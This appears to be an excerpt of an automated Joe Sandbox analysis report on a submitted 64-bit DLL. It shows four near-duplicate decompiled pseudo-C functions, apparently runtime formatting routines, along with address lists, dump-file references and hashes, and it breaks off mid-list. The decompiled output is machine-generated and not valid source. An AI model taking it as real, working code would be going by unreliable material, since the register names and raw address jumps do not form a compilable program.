                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001c64b;
                                                                      				if (_t112 == 0) goto 0x8001c5cf;
                                                                      				if (_t112 == 0) goto 0x8001c5a8;
                                                                      				if (_t112 == 0) goto 0x8001c64b;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001c617;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001c592;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001c592;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c676;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001c68d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c5c9;
                                                                      				goto 0x8001c57b;
                                                                      				goto 0x8001c57b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001c5f1;
                                                                      				goto 0x8001c57b;
                                                                      				goto 0x8001c57b;
                                                                      				if (_t119 == 0) goto 0x8001c560;
                                                                      				if (_t119 == 0) goto 0x8001c560;
                                                                      				if (_t119 == 0) goto 0x8001c560;
                                                                      				goto 0x8001c54e;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001c6e6;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001c66e;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001c57b;
                                                                      				goto 0x8001c57b;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001c696;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001c6b0;
                                                                      				E00000001180021520(0, _t134, _t150, _t160);
                                                                      				goto 0x8001c6b7;
                                                                      				E0000000118001FFA8( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t160);
                                                                      				if (0 == 0) goto 0x8001c6e4;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001c6d5;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001c6e4;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001c510
                                                                      0x18001c515
                                                                      0x18001c51a
                                                                      0x18001c524
                                                                      0x18001c527
                                                                      0x18001c52a
                                                                      0x18001c52d
                                                                      0x18001c530
                                                                      0x18001c536
                                                                      0x18001c538
                                                                      0x18001c53a
                                                                      0x18001c543
                                                                      0x18001c54c
                                                                      0x18001c551
                                                                      0x18001c55a
                                                                      0x18001c560
                                                                      0x18001c568
                                                                      0x18001c582
                                                                      0x18001c587
                                                                      0x18001c58f
                                                                      0x18001c596
                                                                      0x18001c59c
                                                                      0x18001c5a3
                                                                      0x18001c5b0
                                                                      0x18001c5c0
                                                                      0x18001c5c7
                                                                      0x18001c5cd
                                                                      0x18001c5d7
                                                                      0x18001c5e1
                                                                      0x18001c5e8
                                                                      0x18001c5ef
                                                                      0x18001c5f5
                                                                      0x18001c5fa
                                                                      0x18001c603
                                                                      0x18001c60c
                                                                      0x18001c612
                                                                      0x18001c617
                                                                      0x18001c61b
                                                                      0x18001c61e
                                                                      0x18001c625
                                                                      0x18001c629
                                                                      0x18001c634
                                                                      0x18001c639
                                                                      0x18001c63f
                                                                      0x18001c646
                                                                      0x18001c653
                                                                      0x18001c663
                                                                      0x18001c665
                                                                      0x18001c669
                                                                      0x18001c671
                                                                      0x18001c681
                                                                      0x18001c688
                                                                      0x18001c690
                                                                      0x18001c692
                                                                      0x18001c696
                                                                      0x18001c69a
                                                                      0x18001c6a4
                                                                      0x18001c6a9
                                                                      0x18001c6ae
                                                                      0x18001c6b2
                                                                      0x18001c6bf
                                                                      0x18001c6ca
                                                                      0x18001c6d3
                                                                      0x18001c6d5
                                                                      0x18001c6de
                                                                      0x18001c6e1
                                                                      0x18001c6fa

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b849139e90f68dcc7ed434c34ee5f177170d2f82e41448c988f69b5bfc1bc5b8
                                                                      • Instruction ID: 1a40741a12123bf8a366923e67f4d1535cee181772a8ef9a42a75ed13f9f358c
                                                                      • Opcode Fuzzy Hash: b849139e90f68dcc7ed434c34ee5f177170d2f82e41448c988f69b5bfc1bc5b8
                                                                      • Instruction Fuzzy Hash: 9751E277600E1882E7AA8F28C1547AC37A1E359BE8F148219EF06177D8CF30DE85C789
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001C92C(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t160;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001ca13;
                                                                      				if (_t111 == 0) goto 0x8001c97c;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001ca67;
                                                                      				if (_t112 == 0) goto 0x8001c9eb;
                                                                      				if (_t112 == 0) goto 0x8001c9c4;
                                                                      				if (_t112 == 0) goto 0x8001ca67;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001ca33;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001c9ae;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001c9ae;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ca92;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001caa9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c9e5;
                                                                      				goto 0x8001c997;
                                                                      				goto 0x8001c997;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001ca0d;
                                                                      				goto 0x8001c997;
                                                                      				goto 0x8001c997;
                                                                      				if (_t119 == 0) goto 0x8001c97c;
                                                                      				if (_t119 == 0) goto 0x8001c97c;
                                                                      				if (_t119 == 0) goto 0x8001c97c;
                                                                      				goto 0x8001c96a;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001cb02;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001ca8a;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001c997;
                                                                      				goto 0x8001c997;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001cab2;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001cacc;
                                                                      				E00000001180021630(0, _t134, _t150, _t160);
                                                                      				goto 0x8001cad3;
                                                                      				E000000011800200B8( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t160);
                                                                      				if (0 == 0) goto 0x8001cb00;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001caf1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001cb00;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001c92c
                                                                      0x18001c931
                                                                      0x18001c936
                                                                      0x18001c940
                                                                      0x18001c943
                                                                      0x18001c946
                                                                      0x18001c949
                                                                      0x18001c94c
                                                                      0x18001c952
                                                                      0x18001c954
                                                                      0x18001c956
                                                                      0x18001c95f
                                                                      0x18001c968
                                                                      0x18001c96d
                                                                      0x18001c976
                                                                      0x18001c97c
                                                                      0x18001c984
                                                                      0x18001c99e
                                                                      0x18001c9a3
                                                                      0x18001c9ab
                                                                      0x18001c9b2
                                                                      0x18001c9b8
                                                                      0x18001c9bf
                                                                      0x18001c9cc
                                                                      0x18001c9dc
                                                                      0x18001c9e3
                                                                      0x18001c9e9
                                                                      0x18001c9f3
                                                                      0x18001c9fd
                                                                      0x18001ca04
                                                                      0x18001ca0b
                                                                      0x18001ca11
                                                                      0x18001ca16
                                                                      0x18001ca1f
                                                                      0x18001ca28
                                                                      0x18001ca2e
                                                                      0x18001ca33
                                                                      0x18001ca37
                                                                      0x18001ca3a
                                                                      0x18001ca41
                                                                      0x18001ca45
                                                                      0x18001ca50
                                                                      0x18001ca55
                                                                      0x18001ca5b
                                                                      0x18001ca62
                                                                      0x18001ca6f
                                                                      0x18001ca7f
                                                                      0x18001ca81
                                                                      0x18001ca85
                                                                      0x18001ca8d
                                                                      0x18001ca9d
                                                                      0x18001caa4
                                                                      0x18001caac
                                                                      0x18001caae
                                                                      0x18001cab2
                                                                      0x18001cab6
                                                                      0x18001cac0
                                                                      0x18001cac5
                                                                      0x18001caca
                                                                      0x18001cace
                                                                      0x18001cadb
                                                                      0x18001cae6
                                                                      0x18001caef
                                                                      0x18001caf1
                                                                      0x18001cafa
                                                                      0x18001cafd
                                                                      0x18001cb16

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4879a43ff2062e1128ba489a04f180a0de1b885da1a00b0534ee6d6d4ba3cf0c
                                                                      • Instruction ID: a9951b2e2418a3885cb07d2f04b31a9a2b1555f1bf4e6862ae959de690d5cdde
                                                                      • Opcode Fuzzy Hash: 4879a43ff2062e1128ba489a04f180a0de1b885da1a00b0534ee6d6d4ba3cf0c
                                                                      • Instruction Fuzzy Hash: 1751E673614A5882E7AA8F28C0597AC37A0E759F9CF148109EF45577D8CF30CE49C786
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001EF18(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001efff;
                                                                      				if (_t111 == 0) goto 0x8001ef68;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001f053;
                                                                      				if (_t112 == 0) goto 0x8001efd7;
                                                                      				if (_t112 == 0) goto 0x8001efb0;
                                                                      				if (_t112 == 0) goto 0x8001f053;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001f01f;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001ef9a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001ef9a;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f07e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001f095;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001efd1;
                                                                      				goto 0x8001ef83;
                                                                      				goto 0x8001ef83;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001eff9;
                                                                      				goto 0x8001ef83;
                                                                      				goto 0x8001ef83;
                                                                      				if (_t119 == 0) goto 0x8001ef68;
                                                                      				if (_t119 == 0) goto 0x8001ef68;
                                                                      				if (_t119 == 0) goto 0x8001ef68;
                                                                      				goto 0x8001ef56;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001f0ee;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001f076;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001ef83;
                                                                      				goto 0x8001ef83;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001f09e;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001f0b8;
                                                                      				E00000001180022288(0, _t134, _t150);
                                                                      				goto 0x8001f0bf;
                                                                      				E00000001180020CC8( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001f0ec;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001f0dd;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001f0ec;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001ef18
                                                                      0x18001ef1d
                                                                      0x18001ef22
                                                                      0x18001ef2c
                                                                      0x18001ef2f
                                                                      0x18001ef32
                                                                      0x18001ef35
                                                                      0x18001ef38
                                                                      0x18001ef3e
                                                                      0x18001ef40
                                                                      0x18001ef42
                                                                      0x18001ef4b
                                                                      0x18001ef54
                                                                      0x18001ef59
                                                                      0x18001ef62
                                                                      0x18001ef68
                                                                      0x18001ef70
                                                                      0x18001ef8a
                                                                      0x18001ef8f
                                                                      0x18001ef97
                                                                      0x18001ef9e
                                                                      0x18001efa4
                                                                      0x18001efab
                                                                      0x18001efb8
                                                                      0x18001efc8
                                                                      0x18001efcf
                                                                      0x18001efd5
                                                                      0x18001efdf
                                                                      0x18001efe9
                                                                      0x18001eff0
                                                                      0x18001eff7
                                                                      0x18001effd
                                                                      0x18001f002
                                                                      0x18001f00b
                                                                      0x18001f014
                                                                      0x18001f01a
                                                                      0x18001f01f
                                                                      0x18001f023
                                                                      0x18001f026
                                                                      0x18001f02d
                                                                      0x18001f031
                                                                      0x18001f03c
                                                                      0x18001f041
                                                                      0x18001f047
                                                                      0x18001f04e
                                                                      0x18001f05b
                                                                      0x18001f06b
                                                                      0x18001f06d
                                                                      0x18001f071
                                                                      0x18001f079
                                                                      0x18001f089
                                                                      0x18001f090
                                                                      0x18001f098
                                                                      0x18001f09a
                                                                      0x18001f09e
                                                                      0x18001f0a2
                                                                      0x18001f0ac
                                                                      0x18001f0b1
                                                                      0x18001f0b6
                                                                      0x18001f0ba
                                                                      0x18001f0c7
                                                                      0x18001f0d2
                                                                      0x18001f0db
                                                                      0x18001f0dd
                                                                      0x18001f0e6
                                                                      0x18001f0e9
                                                                      0x18001f102

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0d49b9d71076512b6bbbe891cf3289b4b7b27fe3cc3fd9faa2e9cd746c18fb37
                                                                      • Instruction ID: c4762597ef1c1893b3d76005bb8b76fd1862791030d5408f62859f73e2e48fae
                                                                      • Opcode Fuzzy Hash: 0d49b9d71076512b6bbbe891cf3289b4b7b27fe3cc3fd9faa2e9cd746c18fb37
                                                                      • Instruction Fuzzy Hash: 1D51B573604A5883E7AA8F28C1543BC27A0E35DB98F14821AEF45177E9CF31DE4AC780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001F334(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001f41b;
                                                                      				if (_t111 == 0) goto 0x8001f384;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001f46f;
                                                                      				if (_t112 == 0) goto 0x8001f3f3;
                                                                      				if (_t112 == 0) goto 0x8001f3cc;
                                                                      				if (_t112 == 0) goto 0x8001f46f;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001f43b;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001f3b6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001f3b6;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f49a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001f4b1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f3ed;
                                                                      				goto 0x8001f39f;
                                                                      				goto 0x8001f39f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001f415;
                                                                      				goto 0x8001f39f;
                                                                      				goto 0x8001f39f;
                                                                      				if (_t119 == 0) goto 0x8001f384;
                                                                      				if (_t119 == 0) goto 0x8001f384;
                                                                      				if (_t119 == 0) goto 0x8001f384;
                                                                      				goto 0x8001f372;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001f50a;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001f492;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001f39f;
                                                                      				goto 0x8001f39f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001f4ba;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001f4d4;
                                                                      				E000000011800223D0(0, _t134, _t150);
                                                                      				goto 0x8001f4db;
                                                                      				E00000001180020E10( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001f508;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001f4f9;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001f508;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001f334
                                                                      0x18001f339
                                                                      0x18001f33e
                                                                      0x18001f348
                                                                      0x18001f34b
                                                                      0x18001f34e
                                                                      0x18001f351
                                                                      0x18001f354
                                                                      0x18001f35a
                                                                      0x18001f35c
                                                                      0x18001f35e
                                                                      0x18001f367
                                                                      0x18001f370
                                                                      0x18001f375
                                                                      0x18001f37e
                                                                      0x18001f384
                                                                      0x18001f38c
                                                                      0x18001f3a6
                                                                      0x18001f3ab
                                                                      0x18001f3b3
                                                                      0x18001f3ba
                                                                      0x18001f3c0
                                                                      0x18001f3c7
                                                                      0x18001f3d4
                                                                      0x18001f3e4
                                                                      0x18001f3eb
                                                                      0x18001f3f1
                                                                      0x18001f3fb
                                                                      0x18001f405
                                                                      0x18001f40c
                                                                      0x18001f413
                                                                      0x18001f419
                                                                      0x18001f41e
                                                                      0x18001f427
                                                                      0x18001f430
                                                                      0x18001f436
                                                                      0x18001f43b
                                                                      0x18001f43f
                                                                      0x18001f442
                                                                      0x18001f449
                                                                      0x18001f44d
                                                                      0x18001f458
                                                                      0x18001f45d
                                                                      0x18001f463
                                                                      0x18001f46a
                                                                      0x18001f477
                                                                      0x18001f487
                                                                      0x18001f489
